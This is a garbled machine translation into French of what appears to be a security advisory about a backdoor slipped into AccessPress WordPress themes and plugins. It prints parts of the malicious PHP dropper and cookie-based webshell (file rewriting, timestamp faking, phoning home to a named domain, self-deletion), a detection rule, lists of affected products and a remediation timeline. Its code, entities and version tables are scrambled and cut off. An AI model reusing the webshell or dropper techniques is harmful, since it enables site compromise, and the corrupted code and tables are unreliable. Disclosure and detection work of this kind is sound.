Themes Access Press trouve la porte arrière dans les Themes et les plug ins

Ils ont créé un Dropper pour webshell qui permet aux attaquants damp;rsquoaccéder pleinement au site infecté. La burette est dans le fichier initial. Php situé dans le Répertoire damp;rsquoaccueil du plug in ou du sujet. Lors de lamp;rsquoexécution, installez le webshell basé sur des cookies dans WP includes Vars. Php. Le shell est installé directement devant la fonction WP _ is mobile () appelée WP is mobile Fix (). Cela ne soulève probablement aucun doute de la part de quiconque fait défiler accidentellement un fichier Vars. Php.
Fonction makeinit () {
$b64 = amp;lsquoBaamp;rsquo Se64  » Décembre
$b = amp;lsquoznvuy3rpb2.. Tskcg = = amp;lsquo
$f = $u Server [amp;lsquodocument u rootamp;rsquo] amp;lsquo WP inclut variable. Php amp;lsquo
(File _ present ($f)) {
$FP = 0777 et @ fileperms ($f)
$ft = @ filemtime ($f)
$FC = @ file _ get Contents ($f)
(strpos ($FC,
$FC = Str _ replace (amp;lsquoFunction WP is mobile ()amp;rsquo,
B64 $(b $)
$FC)
Fichier _ put content ($F, $FC)
Toucher (F $, FT)
Chmod (F $, FP $)
}
Renvoie True
}
Renvoie False
}
Une fois le shell installé, Dropper a lamp;rsquoimage distante à partir de lamp;rsquoURL par téléphone hxxps:www.wp-theme-connect.comimageswp-theme.jpg Contient lamp;rsquoURL du site infecté et des informations sur le sujet que le site utilise comme paramètre de requête. Enfin, il supprimera le fichier source de la burette pour éviter damp;rsquoêtre détecté à la fin de lamp;rsquoexécution de la demande.
Fonction finishinit () {
Unlink (file)
}
Ajouter une opération (amp;lsquoadmin _ noticesamp;rsquo,amp;rsquo WP notice plug amp;lsquo, 20)
(! Function _ exists (amp;lsquoWP notice plugamp;rsquo) {
Fonction WP _ notice plug () {
Echo
}
}
Register _ shutdown Function (
la chaîne user agent dans la requête est WP _ is mobile et que la requête contient huit cookies spécifiques, webshell lui même est activé. Il combine les cookies fournis et exécute la charge utile.
$is _ WP mobile = ($u Server [amp;lsquohttp user agentamp;rsquo] = amp;lsquoWP is mobileamp;rsquo)
$G = $u cookies
(count ($g) = = 8 amp;amp $is _ WP mobile)?
(QR = $G [33] g [32]) amp;amp (IV = $QR (G [78] g [18]) amp;amp amp;amp nbsp
($u IV = QR ($G [12] $G [17]) amp;amp amp;amp amp;amp ($u IV = @ IV ($G [10], $u IV ($QR ($G [53])) amp;amp amp;amp nbsp
$u IV (): $G
Nous avons également vu une autre variante de la porte arrière, peut être plus ancienne, qui est directement intégrée dans le fichier de fonction. Sujet plug in PHP. Cette variante utilise le même mécanisme pour combiner la charge utile des huit cookies, mais ne filtre pas la chaîne user agent demandée.
Pour samp;rsquoassurer que la burette fonctionne, utilisez le fichier principal du plug in (pour le plug in) ou le fichier de fonction. Php (pour le sujet) a été modifié en utilisant le Code qui exécute le fichier initial. Php (le cas échéant). (IS _ admin () {
Ajouter une action (
}
Fonction APAP _ plugin check () {
(fichier _ exists ( dir U U.
Y compris (dir.
}
}
Un détail surprenant de lamp;rsquohorodatage des plug ins endommagés est quamp;rsquoils datent tous du début de septembre. La plupart sont des dossiers des 6 et 7 septembre, et certains sont des dossiers des 2 et 3 septembre. Comme pour les thèmes, tous les thèmes ont été compromis le 22 septembre, à lamp;rsquoexception de Access Buddy du 9 septembre.
De plus, lamp;rsquohorodatage dans lamp;rsquoarchive zip est très uniforme et presque tous les fichiers ont exactement le même horodatage, à lamp;rsquoexception du fichier plug in principal modifié et du fichier Dropper ajouté (qui est habituellement imprimé environ 2 5 minutes après les autres fichiers de lamp;rsquoarchive). Observez lamp;rsquohorodatage des fichiers Zip téléchargés à partir du dépôt WordPress. Cependant, nous avons constaté que la distribution de lamp;rsquohorodatage correspond à lamp;rsquoheure à laquelle le plug in sujet est réellement mis à jour. La distribution des horodatages dans les archives namp;rsquoest pas non plus très uniforme, ce qui indique quels fichiers ont été mis à jour dans la version et quels fichiers namp;rsquoont pas changé par rapport aux versions précédentes.
Q
Lamp;rsquouesto recommande que les fichiers du site thématique accesspress soient délibérément modifiés après leur publication initiale et quamp;rsquoils fassent lamp;rsquoobjet damp;rsquoune action concertée. Le compromis semble se dérouler en deux étapes, lamp;rsquoune pour les plug ins et lamp;rsquoautre pour les sujets. Chacun damp;rsquoentre eux a déjà essayé de peaufiner le processus. Notre sondage se concentre uniquement sur les thèmes et les plugins disponibles gratuitement sur le site accesspress themes. Nous supposons que leur problème de paiement anticipé a été affecté de la même façon, mais nous namp;rsquoavons pas encore étudié ce problème. avez lamp;rsquoune de ces questions, contactez le support de thème accesspress pour plus de conseils.
lamp;rsquoun des sujets suivants est installé sur votre site, nous recommandons de migrer vers damp;rsquoautres sujets dès que possible. Les thèmes accesspress n’ont pas été mis à jour et ont été extraits du dépôt WordPress. Organisation.

Thème escargot

Accès à des amis

Accesspress Basic

Accesspress Lite

Accesspress Magazine

Parallaxe damp;rsquoaccès

Rayon damp;rsquoaccès

Racine damp;rsquoaccès

Barre de pression damp;rsquoaccès

Magasin damp;rsquoaccès

Agent Lite

Appleto

Camp;rsquoest ça.

Blogueurs

Construction compacte

Doko

Éclairage

Boutique de mode

Photos

Gaga

Gagalite Rock

Une étape

Parallaxe Blog

Parallaxe

Un pari.

Tourne.

Hauts et bas

Rouleaux de papier

Magazines sportifs

Storevilla Hotel

Swing Lite

Lanceur

Lundi

Lite non codée

Unicon Lite

Vmag

Vmagazine Lite

Vmagazine News

Enfants zigcy

Zigcy COSMETICS

Zigcy Lite

Tableau 1: sujets et versions attaqués. lamp;rsquoun des plug ins suivants est installé sur votre site et que le numéro de version est dans la colonne invalide, il est recommandé de passer immédiatement à la version dans la colonne purge. Il est à noter que les plugins installés via WordPress. Les tissus sont propres, bien quamp;rsquoils soient énumérés dans la colonne « mauvais ». Il est toujours recommandé de passer à une version propre et sécurisée connue.

	1,0,0
	3.2.1
	2.92
	2.6.5
	4,5
	1.19.5
	2,5
	1.9.1
	2.4.9
	1.1.6
	1,0,6
	1.0.4
	1.2.6
	1.2.5
	1.0.27
	1.3.5
	1.2.1
	2.4.0
	1,0,8
	1.4.2
	2.2.8
	3.1.157494215
	1.3.6
	1.1.2
	1.3.1
	1.2.0
	2.1.0
	1.2.1
	1.4.1
	1.1.9
	1.3.2
	1.4.1
	1.3.1
	1.2.6
	1.2.7
	1.3.5
	1,0,5
	1,0,6
	1,0,5
	2,0. 9.

Les plug ins qui namp;rsquoont pas de numéro de version dans la colonne Clean namp;rsquoont pas été mis à jour et, si possible, nous recommandons de les remplacer par damp;rsquoautres plug ins.

Instructions de nettoyage des fils mâles plug in escargot

Accesspress mail Anonymous

Accesspress Custom CSS

Accesspress Custom post type

Accesspress Facebook publication automatique

Flux damp;rsquoInstagram damp;rsquoaccès

Pinterest damp;rsquoaccès

Compteur social damp;rsquoaccès

Icône sociale accesspress

Accesspress social login Lite

Partage social damp;rsquoaccès

Accesspress Twitter auto Publishing

Flux Twitter accesspress

AK menu Ione Lite

Partenaire ap

Formulaire de contact ap

AP Custom recommendation

Menu AP Mega

AP Pricing List Thin Edition

Apex notification Bar Lite

Stockage en dB Lite

Commentaire désactiver lamp;rsquoaccès

Easy side tab CTA

Everest Management Theme Lite

Lamp;rsquoEverest approche Soon Lite

Everest Review grade Lite

Everest et Lite

Everest FAQ Manager Lite

Everest Gallery Lite

Everest Google pl
$payload1 =
$payload2 =
$payload3 =
$url0 = https?: (www)? Wp topic Connection . Com ( image wp subject . Jpg)
Conditions:
Tous ($injection *)
Ou tous ($charge utile *)
Ou URL 0 $
}
avez un thème ou un plugin installé directement à partir d’un thème accesspress ou de tout autre endroit en dehors de WordPress, il est recommandé de l’utiliser. Org, devriez immédiatement mettre à jour la version sécurisée indiquée dans le tableau ci dessus. S’il n’y a pas de version sécurisée, Remplacez la par la dernière version de WordPress. Organisation. Gardez à l’esprit que cela ne supprimera pas la porte arrière de votre système, donc devrez également réinstaller la version propre de wordpress pour récupérer les modifications de fichier de base que avez faites lors de l’installation de la porte arrière. avez un thème ou un plug in payant fourni par accesspress themes Keys, nous recommandons de contacter leur support pour obtenir de lamp;rsquoaide. Nous recommandons fortement de mettre en place un plan de sécurité pour votre site, y compris la numérisation et la sauvegarde des fichiers malveillants. Jetpack Security est une excellente option de sécurité pour wordpress pour assurer la sécurité de votre site et de vos visiteurs. Depuis le 30 septembre, jetpack scan a détecté toutes les variantes de cette porte arrière et de cette burette. Échéancier 22 09 2021: lamp;rsquoéquipe de balayage de jetpack a trouvé des gouttelettes et des portes arrière dans le sujet fotography et a tenté de communiquer avec le fournisseur au sujet de la découverte initiale. 27 septembre 2021: confirmer que Dropper + Backdoor est présent dans tous les plug ins actuels et les sujets gratuits téléchargés à partir du site Web du fournisseur. 28 septembre 2021: confirmer que le Dropper + Backdoor namp;rsquoexiste pas dans le téléchargement de WordPress. Org 29 09 2021: essayez de contacter à nouveau le fournisseur pour une mise à jour sur les nouvelles découvertes. 14 octobre 2021: envoyer à l’équipe du plugin wordpress pour essayer d’obtenir un compte

ContactPress Supported By WordPress Plugins

	2.8.0		2.8.1		1.
	2.0.1		2.0.2
	1,0,8		1,0,9
	2.1.3		2.1.4
	4.0.3		4.0.4
	3.3.3		3.3.4
	1.9.1		1.9.2
	1.8.2		1.8.3
	3.4.7		3.4.8
	4.5.5		4.5.6
	1.4.5		1.4.6
	1.6.7		1.6.8
			1,0,9
			1,0,7		2.
	1,0,6		1,0,7
	1.4.6		1.4.7
	3,0,5		3.0.6
	1.1.2		1.1.3
	2.0.4		2,0,5
	1,0,9		1.1.0
	1,0,7		1,0,8
	1,0,7		1,0,8
	1,0,7		1,0,8
	1.1.0		1.1.1
	2.0.4		2,0,5
	2.0.7		2,0,8
	1,0,8		1,0,9
	1,0,8		1,0,9